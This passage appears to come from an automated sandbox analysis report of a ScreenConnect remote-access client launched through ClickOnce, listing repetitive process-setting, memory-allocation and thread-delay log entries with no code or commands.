                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 25D1BC00000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeMemory allocated: 25D356B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeMemory allocated: 1470000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeMemory allocated: 1AEA0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeMemory allocated: D60000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeMemory allocated: 2870000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeMemory allocated: 26C0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeMemory allocated: 1BC0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeMemory allocated: 1E10000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeMemory allocated: 1C40000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeMemory allocated: 1150000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Apps\2.0\O0AJLZ89.O67\32B9QCNC.LYY\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exeMemory allocated: 1ADE0000 memory reserve | memory write watch
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599765Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599653Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599544Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599437Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599309Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599188Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 599061Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598938Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598813Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598688Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598562Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598451Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598344Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598219Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 598108Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597932Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597777Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597665Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597560Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597453Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597343Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597234Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597124Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 597014Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596905Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596797Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596687Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596578Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596468Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596249Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596140Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 596031Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595922Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595812Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595702Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595593Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595474Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595359Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595238Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 595050Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594934Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594828Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594719Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594609Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594500Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594391Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594281Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeThread delayed: delay time: 594172Jump to behavior
